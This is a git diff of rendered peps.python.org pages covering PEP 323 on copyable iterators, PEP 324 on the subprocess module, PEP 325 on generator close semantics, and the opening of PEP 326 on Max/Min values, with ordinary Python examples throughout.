Here is an example, in pure Python, of how the ‘enumerate’ +built-in could be extended to support __copy__ if its underlying +iterator also supported __copy__:

+
class enumerate(object):
+
+    def __init__(self, it):
+        self.it = iter(it)
+        self.i = -1
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        self.i += 1
+        return self.i, self.it.next()
+
+    def __copy__(self):
+        result = self.__class__.__new__(self.__class__)
+        result.it = self.it.__copy__()
+        result.i = self.i
+        return result
+
+
+

Here is an example of the kind of “fragility” produced by “accidental +copyability” of an iterator – the reason why one must NOT use +copy.copy expecting, if it succeeds, to receive as a result an +iterator which is iterable-on independently from the original. Here +is an iterator class that iterates (in preorder) on “trees” which, for +simplicity, are just nested lists – any item that’s a list is treated +as a subtree, any other item as a leaf.

+
class ListreeIter(object):
+
+    def __init__(self, tree):
+        self.tree = [tree]
+        self.indx = [-1]
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        if not self.indx:
+            raise StopIteration
+        self.indx[-1] += 1
+        try:
+            result = self.tree[-1][self.indx[-1]]
+        except IndexError:
+            self.tree.pop()
+            self.indx.pop()
+            return self.next()
+        if type(result) is not list:
+            return result
+        self.tree.append(result)
+        self.indx.append(-1)
+        return self.next()
+
+
+

Now, for example, the following code:

+
import copy
+x = [ [1,2,3], [4, 5, [6, 7, 8], 9], 10, 11, [12] ]
+
+print 'showing all items:',
+it = ListreeIter(x)
+for i in it:
+    print i,
+    if i==6: cop = copy.copy(it)
+print
+
+print 'showing items >6 again:'
+for i in cop: print i,
+print
+
+
+

does NOT work as intended – the “cop” iterator gets consumed, and +exhausted, step by step as the original “it” iterator is, because +the accidental (rather than deliberate) copying performed by +copy.copy shares, rather than duplicating the “index” list, which +is the mutable attribute it.indx (a list of numerical indices). +Thus, this “client code” of the iterator, which attempts to iterate +twice over a portion of the sequence via a copy.copy on the +iterator, is NOT correct.

+

Some correct solutions include using itertools.tee, i.e., changing +the first for loop into:

+
for i in it:
+    print i,
+    if i==6:
+        it, cop = itertools.tee(it)
+        break
+for i in it: print i,
+
+
+

(note that we MUST break the loop in two, otherwise we’d still +be looping on the ORIGINAL value of it, which must NOT be used +further after the call to tee!!!); or making a list, i.e.

+
for i in it:
+    print i,
+    if i==6:
+        cop = lit = list(it)
+        break
+for i in lit: print i,
+
+
+

(again, the loop must be broken in two, since iterator ‘it’ +gets exhausted by the call list(it)).

+

Finally, all of these solutions would work if Listiter supplied +a suitable __copy__ method, as this PEP recommends:

+
def __copy__(self):
+    result = self.__class__.__new__(self.__class__)
+    result.tree = copy.copy(self.tree)
+    result.indx = copy.copy(self.indx)
+    return result
+
+
+

There is no need to get any “deeper” in the copy, but the two +mutable “index state” attributes must indeed be copied in order +to achieve a “proper” (independently iterable) iterator-copy.

+

The recommended solution is to have class Listiter supply this +__copy__ method AND have client code use itertools.tee (with +the split-in-two-parts loop as shown above). This will make +client code maximally tolerant of different iterator types it +might be using AND achieve good performance for tee’ing of this +specific iterator type at the same time.

+
+
+

References

+

[1] Discussion on python-dev starting at post: + https://mail.python.org/pipermail/python-dev/2003-October/038969.html

+

[2] Online documentation for the copy module of the standard library: + https://docs.python.org/release/2.6/library/copy.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0323.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0324/index.html b/pep-0324/index.html new file mode 100644 index 00000000000..1df898c4146 --- /dev/null +++ b/pep-0324/index.html @@ -0,0 +1,644 @@ + PEP 324 – subprocess - New process module | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 324 – subprocess - New process module

+
+
Author:
+
Peter Astrand <astrand at lysator.liu.se>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Nov-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP describes a new module for starting and communicating +with processes.

+
+
+

Motivation

+

Starting new processes is a common task in any programming +language, and very common in a high-level language like Python. +Good support for this task is needed, because:

+
    +
  • Inappropriate functions for starting processes could mean a +security risk: If the program is started through the shell, and +the arguments contain shell meta characters, the result can be +disastrous. [1]
  • +
  • It makes Python an even better replacement language for +over-complicated shell scripts.
  • +
+

Currently, Python has a large number of different functions for +process creation. This makes it hard for developers to choose.

+

The subprocess module provides the following enhancements over +previous functions:

+
    +
  • One “unified” module provides all functionality from previous +functions.
  • +
  • Cross-process exceptions: Exceptions happening in the child +before the new process has started to execute are re-raised in +the parent. This means that it’s easy to handle exec() +failures, for example. With popen2, for example, it’s +impossible to detect if the execution failed.
  • +
  • A hook for executing custom code between fork and exec. This +can be used for, for example, changing uid.
  • +
  • No implicit call of /bin/sh. This means that there is no need +for escaping dangerous shell meta characters.
  • +
  • All combinations of file descriptor redirection is possible. +For example, the “python-dialog” [2] needs to spawn a process +and redirect stderr, but not stdout. This is not possible with +current functions, without using temporary files.
  • +
  • With the subprocess module, it’s possible to control if all open +file descriptors should be closed before the new program is +executed.
  • +
  • Support for connecting several subprocesses (shell “pipe”).
  • +
  • Universal newline support.
  • +
  • A communicate() method, which makes it easy to send stdin data +and read stdout and stderr data, without risking deadlocks. +Most people are aware of the flow control issues involved with +child process communication, but not all have the patience or +skills to write a fully correct and deadlock-free select loop. +This means that many Python applications contain race +conditions. A communicate() method in the standard library +solves this problem.
  • +
+
+
+

Rationale

+

The following points summarizes the design:

+
    +
  • subprocess was based on popen2, which is tried-and-tested.
  • +
  • The factory functions in popen2 have been removed, because I +consider the class constructor equally easy to work with.
  • +
  • popen2 contains several factory functions and classes for +different combinations of redirection. subprocess, however, +contains one single class. Since the subprocess module supports +12 different combinations of redirection, providing a class or +function for each of them would be cumbersome and not very +intuitive. Even with popen2, this is a readability problem. +For example, many people cannot tell the difference between +popen2.popen2 and popen2.popen4 without using the documentation.
  • +
  • One small utility function is provided: subprocess.call(). It +aims to be an enhancement over os.system(), while still very +easy to use:
      +
    • It does not use the Standard C function system(), which has +limitations.
    • +
    • It does not call the shell implicitly.
    • +
    • No need for quoting; using an argument list.
    • +
    • The return value is easier to work with.
    • +
    +

    The call() utility function accepts an ‘args’ argument, just +like the Popen class constructor. It waits for the command to +complete, then returns the returncode attribute. The +implementation is very simple:

    +
    def call(*args, **kwargs):
    +    return Popen(*args, **kwargs).wait()
    +
    +
    +

    The motivation behind the call() function is simple: Starting a +process and wait for it to finish is a common task.

    +

    While Popen supports a wide range of options, many users have +simple needs. Many people are using os.system() today, mainly +because it provides a simple interface. Consider this example:

    +
    os.system("stty sane -F " + device)
    +
    +
    +

    With subprocess.call(), this would look like:

    +
    subprocess.call(["stty", "sane", "-F", device])
    +
    +
    +

    or, if executing through the shell:

    +
    subprocess.call("stty sane -F " + device, shell=True)
    +
    +
    +
  • +
  • The “preexec” functionality makes it possible to run arbitrary +code between fork and exec. One might ask why there are special +arguments for setting the environment and current directory, but +not for, for example, setting the uid. The answer is:
      +
    • Changing environment and working directory is considered +fairly common.
    • +
    • Old functions like spawn() has support for an +“env”-argument.
    • +
    • env and cwd are considered quite cross-platform: They make +sense even on Windows.
    • +
    +
  • +
  • On POSIX platforms, no extension module is required: the module +uses os.fork(), os.execvp() etc.
  • +
  • On Windows platforms, the module requires either Mark Hammond’s +Windows extensions [5], or a small extension module called +_subprocess.
  • +
+
+
+

Specification

+

This module defines one class called Popen:

+
class Popen(args, bufsize=0, executable=None,
+            stdin=None, stdout=None, stderr=None,
+            preexec_fn=None, close_fds=False, shell=False,
+            cwd=None, env=None, universal_newlines=False,
+            startupinfo=None, creationflags=0):
+
+
+

Arguments are:

+
    +
  • args should be a string, or a sequence of program arguments. +The program to execute is normally the first item in the args +sequence or string, but can be explicitly set by using the +executable argument.

    On UNIX, with shell=False (default): In this case, the Popen +class uses os.execvp() to execute the child program. args +should normally be a sequence. A string will be treated as a +sequence with the string as the only item (the program to +execute).

    +

    On UNIX, with shell=True: If args is a string, it specifies the +command string to execute through the shell. If args is a +sequence, the first item specifies the command string, and any +additional items will be treated as additional shell arguments.

    +

    On Windows: the Popen class uses CreateProcess() to execute the +child program, which operates on strings. If args is a +sequence, it will be converted to a string using the +list2cmdline method. Please note that not all MS Windows +applications interpret the command line the same way: The +list2cmdline is designed for applications using the same rules +as the MS C runtime.

    +
  • +
  • bufsize, if given, has the same meaning as the corresponding +argument to the built-in open() function: 0 means unbuffered, 1 +means line buffered, any other positive value means use a buffer +of (approximately) that size. A negative bufsize means to use +the system default, which usually means fully buffered. The +default value for bufsize is 0 (unbuffered).
  • +
  • stdin, stdout and stderr specify the executed programs’ standard +input, standard output and standard error file handles, +respectively. Valid values are PIPE, an existing file +descriptor (a positive integer), an existing file object, and +None. PIPE indicates that a new pipe to the child should be +created. With None, no redirection will occur; the child’s file +handles will be inherited from the parent. Additionally, stderr +can be STDOUT, which indicates that the stderr data from the +applications should be captured into the same file handle as for +stdout.
  • +
  • If preexec_fn is set to a callable object, this object will be +called in the child process just before the child is executed.
  • +
  • If close_fds is true, all file descriptors except 0, 1 and 2 +will be closed before the child process is executed.
  • +
  • If shell is true, the specified command will be executed through +the shell.
  • +
  • If cwd is not None, the current directory will be changed to cwd +before the child is executed.
  • +
  • If env is not None, it defines the environment variables for the +new process.
  • +
  • If universal_newlines is true, the file objects stdout and +stderr are opened as a text file, but lines may be terminated +by any of \n, the Unix end-of-line convention, \r, the +Macintosh convention or \r\n, the Windows convention. All of +these external representations are seen as \n by the Python +program. Note: This feature is only available if Python is +built with universal newline support (the default). Also, the +newlines attribute of the file objects stdout, stdin and stderr +are not updated by the communicate() method.
  • +
  • The startupinfo and creationflags, if given, will be passed to +the underlying CreateProcess() function. They can specify +things such as appearance of the main window and priority for +the new process. (Windows only)
  • +
+

This module also defines two shortcut functions:

+
    +
  • +
    call(*args, **kwargs):
    Run command with arguments. Wait for command to complete, +then return the returncode attribute.

    The arguments are the same as for the Popen constructor. +Example:

    +
    retcode = call(["ls", "-l"])
    +
    +
    +
    +
    +
  • +
+
+

Exceptions

+

Exceptions raised in the child process, before the new program has +started to execute, will be re-raised in the parent. +Additionally, the exception object will have one extra attribute +called ‘child_traceback’, which is a string containing traceback +information from the child’s point of view.

+

The most common exception raised is OSError. This occurs, for +example, when trying to execute a non-existent file. Applications +should prepare for OSErrors.

+

A ValueError will be raised if Popen is called with invalid +arguments.

+
+
+

Security

+

Unlike some other popen functions, this implementation will never +call /bin/sh implicitly. This means that all characters, +including shell meta-characters, can safely be passed to child +processes.

+
+
+

Popen objects

+

Instances of the Popen class have the following methods:

+
+
poll()
Check if child process has terminated. Returns returncode +attribute.
+
wait()
Wait for child process to terminate. Returns returncode +attribute.
+
communicate(input=None)
Interact with process: Send data to stdin. Read data from +stdout and stderr, until end-of-file is reached. Wait for +process to terminate. The optional stdin argument should be a +string to be sent to the child process, or None, if no data +should be sent to the child.

communicate() returns a tuple (stdout, stderr).

+

Note: The data read is buffered in memory, so do not use this +method if the data size is large or unlimited.

+
+
+

The following attributes are also available:

+
+
stdin
If the stdin argument is PIPE, this attribute is a file object +that provides input to the child process. Otherwise, it is +None.
+
stdout
If the stdout argument is PIPE, this attribute is a file +object that provides output from the child process. +Otherwise, it is None.
+
stderr
If the stderr argument is PIPE, this attribute is file object +that provides error output from the child process. Otherwise, +it is None.
+
pid
The process ID of the child process.
+
returncode
The child return code. A None value indicates that the +process hasn’t terminated yet. A negative value -N indicates +that the child was terminated by signal N (UNIX only).
+
+
+
+
+

Replacing older functions with the subprocess module

+

In this section, “a ==> b” means that b can be used as a +replacement for a.

+

Note: All functions in this section fail (more or less) silently +if the executed program cannot be found; this module raises an +OSError exception.

+

In the following examples, we assume that the subprocess module is +imported with from subprocess import *.

+
+

Replacing /bin/sh shell backquote

+
output=`mycmd myarg`
+==>
+output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0]
+
+
+
+
+

Replacing shell pipe line

+
output=`dmesg | grep hda`
+==>
+p1 = Popen(["dmesg"], stdout=PIPE)
+p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE)
+output = p2.communicate()[0]
+
+
+
+
+

Replacing os.system()

+
sts = os.system("mycmd" + " myarg")
+==>
+p = Popen("mycmd" + " myarg", shell=True)
+sts = os.waitpid(p.pid, 0)
+
+
+

Note:

+
    +
  • Calling the program through the shell is usually not required.
  • +
  • It’s easier to look at the returncode attribute than the +exit status.
  • +
+

A more real-world example would look like this:

+
try:
+    retcode = call("mycmd" + " myarg", shell=True)
+    if retcode < 0:
+        print >>sys.stderr, "Child was terminated by signal", -retcode
+    else:
+        print >>sys.stderr, "Child returned", retcode
+except OSError, e:
+    print >>sys.stderr, "Execution failed:", e
+
+
+
+
+

Replacing os.spawn*

+

P_NOWAIT example:

+
pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg")
+==>
+pid = Popen(["/bin/mycmd", "myarg"]).pid
+
+
+

P_WAIT example:

+
retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg")
+==>
+retcode = call(["/bin/mycmd", "myarg"])
+
+
+

Vector example:

+
os.spawnvp(os.P_NOWAIT, path, args)
+==>
+Popen([path] + args[1:])
+
+
+

Environment example:

+
os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env)
+==>
+Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"})
+
+
+
+
+

Replacing os.popen*

+
pipe = os.popen(cmd, mode='r', bufsize)
+==>
+pipe = Popen(cmd, shell=True, bufsize=bufsize, stdout=PIPE).stdout
+
+pipe = os.popen(cmd, mode='w', bufsize)
+==>
+pipe = Popen(cmd, shell=True, bufsize=bufsize, stdin=PIPE).stdin
+
+
+(child_stdin, child_stdout) = os.popen2(cmd, mode, bufsize)
+==>
+p = Popen(cmd, shell=True, bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, close_fds=True)
+(child_stdin, child_stdout) = (p.stdin, p.stdout)
+
+
+(child_stdin,
+ child_stdout,
+ child_stderr) = os.popen3(cmd, mode, bufsize)
+==>
+p = Popen(cmd, shell=True, bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
+(child_stdin,
+ child_stdout,
+ child_stderr) = (p.stdin, p.stdout, p.stderr)
+
+
+(child_stdin, child_stdout_and_stderr) = os.popen4(cmd, mode, bufsize)
+==>
+p = Popen(cmd, shell=True, bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
+(child_stdin, child_stdout_and_stderr) = (p.stdin, p.stdout)
+
+
+
+
+

Replacing popen2.*

+

Note: If the cmd argument to popen2 functions is a string, the +command is executed through /bin/sh. If it is a list, the command +is directly executed.

+
(child_stdout, child_stdin) = popen2.popen2("somestring", bufsize, mode)
+==>
+p = Popen(["somestring"], shell=True, bufsize=bufsize
+          stdin=PIPE, stdout=PIPE, close_fds=True)
+(child_stdout, child_stdin) = (p.stdout, p.stdin)
+
+
+(child_stdout, child_stdin) = popen2.popen2(["mycmd", "myarg"], bufsize, mode)
+==>
+p = Popen(["mycmd", "myarg"], bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, close_fds=True)
+(child_stdout, child_stdin) = (p.stdout, p.stdin)
+
+
+

The popen2.Popen3 and popen3.Popen4 basically works as +subprocess.Popen, except that:

+
  • subprocess.Popen raises an exception if the execution fails
  • the capturestderr argument is replaced with the stderr argument.
  • stdin=PIPE and stdout=PIPE must be specified.
  • popen2 closes all file descriptors by default, but you have to specify close_fds=True with subprocess.Popen.
+
+
+
+

Open Issues

+

Some features have been requested but are not yet implemented. These include:

+
  • Support for managing a whole flock of subprocesses
  • Support for managing “daemon” processes
  • Built-in method for killing subprocesses
+

While these are useful features, it’s expected that these can be +added later without problems.

+
  • expect-like functionality, including pty support.
+

pty support is highly platform-dependent, which is a +problem. Also, there are already other modules that provide this +kind of functionality [6].

+
+
+

Backwards Compatibility

+

Since this is a new module, no major backward compatibility issues are expected. The module name “subprocess” might collide with other, previous modules [3] with the same name, but the name “subprocess” seems to be the best suggested name so far. The first name of this module was “popen5”, but this name was considered too unintuitive. For a while, the module was called “process”, but this name is already used by Trent Mick’s module [4].

+

The functions and modules that this new module is trying to +replace (os.system, os.spawn*, os.popen*, popen2.*, +commands.*) are expected to be available in future Python versions +for a long time, to preserve backwards compatibility.

+
+
+

Reference Implementation

+

A reference implementation is available from +http://www.lysator.liu.se/~astrand/popen5/.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0324.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0325/index.html b/pep-0325/index.html new file mode 100644 index 00000000000..65c517d058d --- /dev/null +++ b/pep-0325/index.html @@ -0,0 +1,370 @@ + + + + + + + + PEP 325 – Resource-Release Support for Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 325 – Resource-Release Support for Generators

+
+
Author:
+
Samuele Pedroni <pedronis at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Aug-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Generators allow for natural coding and abstraction of traversal over data. Currently, if external resources needing proper timely release are involved, generators are unfortunately not adequate. The typical idiom for timely release is not supported: a yield statement is not allowed in the try clause of a try-finally statement inside a generator. Execution of the finally clause can be neither guaranteed nor enforced.

+

This PEP proposes that the built-in generator type implement a +close method and destruction semantics, such that the restriction +on yield placement can be lifted, expanding the applicability of +generators.

+
+
+

Pronouncement

+

Rejected in favor of PEP 342 which includes substantially all of +the requested behavior in a more refined form.

+
+
+

Rationale

+

Python generators allow for natural coding of many data traversal scenarios. Their instantiation produces iterators, i.e. first-class objects abstracting traversal (with all the advantages of first-classness). In this respect they match in power, and offer some advantages over, the approach using iterator methods taking a (smalltalkish) block. On the other hand, given the current limitations (no yield allowed in a try clause of a try-finally inside a generator), the latter approach seems better suited to encapsulating not only traversal but also exception handling and proper resource acquisition and release.

+

Let’s consider an example (for simplicity, files in read-mode are +used):

+
def all_lines(index_path):
+    for path in file(index_path, "r"):
+        for line in file(path.strip(), "r"):
+            yield line
+
+
+

this is short and to the point, but the try-finally for timely closing of the files cannot be added. (While a file, whose closing would then be the responsibility of the caller, could be passed in instead of a path, the same is not possible for the files opened depending on the contents of the index.)

+

If we want timely release, we have to sacrifice the simplicity and +directness of the generator-only approach: (e.g.)

+
class AllLines:
+
+     def __init__(self, index_path):
+         self.index_path = index_path
+         self.index = None
+         self.document = None
+
+     def __iter__(self):
+         self.index = file(self.index_path, "r")
+         for path in self.index:
+             self.document = file(path.strip(), "r")
+             for line in self.document:
+                 yield line
+             self.document.close()
+             self.document = None
+
+     def close(self):
+         if self.index:
+             self.index.close()
+         if self.document:
+             self.document.close()
+
+
+

to be used as:

+
all_lines = AllLines("index.txt")
+try:
+    for line in all_lines:
+        ...
+finally:
+    all_lines.close()
+
+
+

The more convoluted solution implementing timely release, seems +to offer a precious hint. What we have done is encapsulate our +traversal in an object (iterator) with a close method.

+

This PEP proposes that generators should grow such a close method +with such semantics that the example could be rewritten as:

+
# Today this is not valid Python: yield is not allowed between
+# try and finally, and generator type instances support no
+# close method.
+
+def all_lines(index_path):
+    index = file(index_path, "r")
+    try:
+        for path in index:
+            document = file(path.strip(), "r")
+            try:
+                for line in document:
+                    yield line
+            finally:
+                document.close()
+    finally:
+        index.close()
+
+all = all_lines("index.txt")
+try:
+    for line in all:
+        ...
+finally:
+    all.close() # close on generator
+
+
+

Currently PEP 255 disallows yield inside a try clause of a +try-finally statement, because the execution of the finally clause +cannot be guaranteed as required by try-finally semantics.

+

The semantics of the proposed close method should be such that +while the finally clause execution still cannot be guaranteed, it +can be enforced when required. Specifically, the close method +behavior should trigger the execution of the finally clauses +inside the generator, either by forcing a return in the generator +frame or by throwing an exception in it. In situations requiring +timely resource release, close could then be explicitly invoked.

+

The semantics of generator destruction on the other hand should be +extended in order to implement a best-effort policy for the +general case. Specifically, destruction should invoke close(). +The best-effort limitation comes from the fact that the +destructor’s execution is not guaranteed in the first place.

+

This seems to be a reasonable compromise, the resulting global +behavior being similar to that of files and closing.

+
+
+

Possible Semantics

+

The built-in generator type should have a close method +implemented, which can then be invoked as:

+
gen.close()
+
+
+

where gen is an instance of the built-in generator type. +Generator destruction should also invoke close method behavior.

+

If a generator is already terminated, close should be a no-op.

+

Otherwise, there are two alternative solutions, Return or +Exception Semantics:

+

A - Return Semantics: The generator should be resumed, and generator execution should continue as if the instruction at the re-entry point were a return. Consequently, finally clauses surrounding the re-entry point would be executed, in the case of a then-allowed try-yield-finally pattern.

+

Issues: is it important to be able to distinguish forced termination by close, normal termination, and exception propagation from the generator or generator-called code? In the normal case it seems not: finally clauses should be there to work the same in all these cases; still, this semantics could make such a distinction hard.

+

Except clauses, as with a normal return, are not executed; such clauses in legacy generators expect to be executed for exceptions raised by the generator or by code called from it. Not executing them in the close case seems correct.

+

B - Exception Semantics: The generator should be resumed and execution should continue as if a special-purpose exception (e.g. CloseGenerator) had been raised at the re-entry point. The close implementation should consume this exception and not propagate it further.

+

Issues: should StopIteration be reused for this purpose? Probably +not. We would like close to be a harmless operation for legacy +generators, which could contain code catching StopIteration to +deal with other generators/iterators.

+

In general, with exception semantics, it is unclear what to do if +the generator does not terminate or we do not receive the special +exception propagated back. Other different exceptions should +probably be propagated, but consider this possible legacy +generator code:

+
try:
+    ...
+    yield ...
+    ...
+except: # or except Exception:, etc
+    raise Exception("boom")
+
+
+

If close is invoked with the generator suspended after the yield, the except clause would catch our special-purpose exception, so we would get a different exception propagated back. In this case it ought reasonably to be consumed and ignored, but in general it should be propagated; separating these scenarios seems hard.

+

The exception approach has the advantage to let the generator +distinguish between termination cases and have more control. On +the other hand, clear-cut semantics seem harder to define.
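
For historical perspective, PEP 342 (in whose favor this PEP was rejected) adopted essentially the Exception Semantics sketched above: generators grew a close() method that raises GeneratorExit at the suspension point, so enclosing finally clauses run. A minimal illustration in today's Python (the file name is just an assumption):

+
def lines(path):
+    f = open(path)
+    try:
+        for line in f:
+            yield line
+    finally:
+        f.close()
+
+g = lines("index.txt")    # assumes such a file exists
+first = next(g)
+g.close()    # raises GeneratorExit at the yield; the finally clause runs
+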

+
+
+

Remarks

+

If this proposal is accepted, it should become common practice to +document whether a generator acquires resources, so that its close +method ought to be called. If a generator is no longer used, +calling close should be harmless.

+

On the other hand, in the typical scenario the code that +instantiated the generator should call close if required by it. +Generic code dealing with iterators/generators instantiated +elsewhere should typically not be littered with close calls.

+

The rare case of code that has acquired ownership of, and needs to properly deal with, all of: iterators, generators, and generators acquiring resources that need timely release, is easily solved:

+
if hasattr(iterator, 'close'):
+    iterator.close()
+
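
As a modern aside, contextlib.closing (added in Python 2.5) packages exactly this close-on-exit pattern as a context manager for any object with a close() method; a brief sketch reusing the all_lines generator proposed above:

+
from contextlib import closing
+
+with closing(all_lines("index.txt")) as lines:   # all_lines as proposed earlier
+    for line in lines:
+        pass
+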
+
+
+
+

Open Issues

+

Definitive semantics ought to be chosen. Currently Guido favors Exception Semantics. If the generator yields a value instead of terminating or propagating back the special exception, a special exception should be raised again on the generator side.

+

It is still unclear whether spuriously converted special +exceptions (as discussed in Possible Semantics) are a problem and +what to do about them.

+

Implementation issues should be explored.

+
+
+

Alternative Ideas

+

The idea that the yield placement limitation should be removed and +that generator destruction should trigger execution of finally +clauses has been proposed more than once. Alone it cannot +guarantee that timely release of resources acquired by a generator +can be enforced.

+

PEP 288 proposes a more general solution, allowing custom exception passing to generators. The proposal in this PEP addresses more directly the problem of resource release. Were PEP 288 implemented, Exception Semantics for close could be layered on top of it; on the other hand, PEP 288 should make a separate case for the more general functionality.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0325.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0326/index.html b/pep-0326/index.html new file mode 100644 index 00000000000..8b8203c888c --- /dev/null +++ b/pep-0326/index.html @@ -0,0 +1,613 @@ + + + + + + + + PEP 326 – A Case for Top and Bottom Values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 326 – A Case for Top and Bottom Values

+
+
Author:
+
Josiah Carlson <jcarlson at uci.edu>, +Terry Reedy <tjreedy at udel.edu>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Dec-2003
+
Python-Version:
+
2.4
+
Post-History:
+
20-Dec-2003, 03-Jan-2004, 05-Jan-2004, 07-Jan-2004, +21-Feb-2004
+
+
+
+
Table of Contents +
+
+

Results

+

This PEP has been rejected by the BDFL [8]. As per the +pseudo-sunset clause [9], PEP 326 is being updated one last time +with the latest suggestions, code modifications, etc., and includes a +link to a module [10] that implements the behavior described in the +PEP. Users who desire the behavior listed in this PEP are encouraged +to use the module for the reasons listed in +Independent Implementations?.

+
+
+

Abstract

+

This PEP proposes two singleton constants that represent a top and +bottom [3] value: Max and Min (or two similarly suggestive +names [4]; see Open Issues).

+

As suggested by their names, Max and Min would compare higher or lower than any other object (respectively). Such behavior results in easier-to-understand code and fewer special cases in which a temporary minimum or maximum value is required, and an actual minimum or maximum numeric value is not limited.

+
+
+

Rationale

+

While None can be used as an absolute minimum that any value can +attain [1], this may be deprecated [4] in Python 3.0 and shouldn’t +be relied upon.

+

As a replacement for None being used as an absolute minimum, as well as the introduction of an absolute maximum, the introduction of the two singleton constants Max and Min addresses the concern that such constants be self-documenting.

+

What is commonly done to deal with absolute minimum or maximum values is to set a value that is larger than the script author ever expects the input to reach, and hope that it isn’t reached.

+

Guido has brought up [2] the fact that there exist two constants that can be used in the interim for maximum values: sys.maxint and floating point positive infinity (1e309 will evaluate to positive infinity). However, each has its drawbacks.

+
    +
  • On most architectures sys.maxint is arbitrarily small (2**31-1 or +2**63-1) and can be easily eclipsed by large ‘long’ integers or +floating point numbers.
  • Comparing long integers larger than the largest floating point +number representable against any float will result in an exception +being raised:
    >>> cmp(1.0, 10**309)
    +Traceback (most recent call last):
    +File "<stdin>", line 1, in ?
    +OverflowError: long int too large to convert to float
    +
    +
    +

    Even when large integers are compared against positive infinity:

    +
    >>> cmp(1e309, 10**309)
    +Traceback (most recent call last):
    +File "<stdin>", line 1, in ?
    +OverflowError: long int too large to convert to float
    +
    +
    +
  • These same drawbacks exist when numbers are negative.
+

Introducing Max and Min that work as described above does not +take much effort. A sample Python reference implementation of both +is included.

+
+
+

Motivation

+

There are hundreds of algorithms that begin by initializing some set of values to a logical (or numeric) infinity or negative infinity. Python lacks either kind of infinity that works consistently or really is the most extreme value that can be attained. By adding Max and Min, Python would have a real maximum and minimum value, and such algorithms could become clearer due to the reduction of special cases.

+
+

Max Examples

+

When testing various kinds of servers, it is sometimes necessary to +only serve a certain number of clients before exiting, which results +in code like the following:

+
count = 5
+
+def counts(stop):
+    i = 0
+    while i < stop:
+        yield i
+        i += 1
+
+for client_number in counts(count):
+    handle_one_client()
+
+
+

When using Max as the value assigned to count, our testing server +becomes a production server with minimal effort.

+

As another example, consider Dijkstra’s shortest path algorithm on a graph with weighted edges (all positive):

+
  1. Set distances to every node in the graph to infinity.
  2. Set the distance to the start node to zero.
  3. Set visited to be an empty mapping.
  4. While the shortest distance of a node that has not been visited is less than infinity and the destination has not been visited:
      1. Get the node with the shortest distance.
      2. Visit the node.
      3. Update neighbor distances and parent pointers if necessary for neighbors that have not been visited.
  5. If the destination has been visited, step back through parent pointers to find the reverse of the path to be taken.
+

Below is an example of Dijkstra’s shortest path algorithm on a graph with weighted edges, using a table (a faster version that uses a heap is available, but this version is offered due to its similarity to the description above; the heap version is available via older versions of this document).

+
def DijkstraSP_table(graph, S, T):
+    table = {}                                                 #3
+    for node in graph.iterkeys():
+        #(visited, distance, node, parent)
+        table[node] = (0, Max, node, None)                     #1
+    table[S] = (0, 0, S, None)                                 #2
+    cur = min(table.values())                                  #4a
+    while (not cur[0]) and cur[1] < Max:                       #4
+        (visited, distance, node, parent) = cur
+        table[node] = (1, distance, node, parent)              #4b
+        for cdist, child in graph[node]:                       #4c
+            ndist = distance+cdist                             #|
+            if not table[child][0] and ndist < table[child][1]:#|
+                table[child] = (0, ndist, child, node)         #|_
+        cur = min(table.values())                              #4a
+    if not table[T][0]:
+        return None
+    cur = T                                                    #5
+    path = [T]                                                 #|
+    while table[cur][3] is not None:                           #|
+        path.append(table[cur][3])                             #|
+        cur = path[-1]                                         #|
+    path.reverse()                                             #|
+    return path                                                #|_
+
+
+

Readers should note that replacing Max in the above code with an +arbitrarily large number does not guarantee that the shortest path +distance to a node will never exceed that number. Well, with one +caveat: one could certainly sum up the weights of every edge in the +graph, and set the ‘arbitrarily large number’ to that total. However, +doing so does not make the algorithm any easier to understand and has +potential problems with numeric overflows.

+

Gustavo Niemeyer [7] points out that using a more Pythonic data +structure than tuples, to store information about node distances, +increases readability. Two equivalent node structures (one using +None, the other using Max) and their use in a suitably +modified Dijkstra’s shortest path algorithm is given below.

+
class SuperNode:
+    def __init__(self, node, parent, distance, visited):
+        self.node = node
+        self.parent = parent
+        self.distance = distance
+        self.visited = visited
+
+class MaxNode(SuperNode):
+    def __init__(self, node, parent=None, distance=Max,
+                 visited=False):
+        SuperNode.__init__(self, node, parent, distance, visited)
+    def __cmp__(self, other):
+        return cmp((self.visited, self.distance),
+                   (other.visited, other.distance))
+
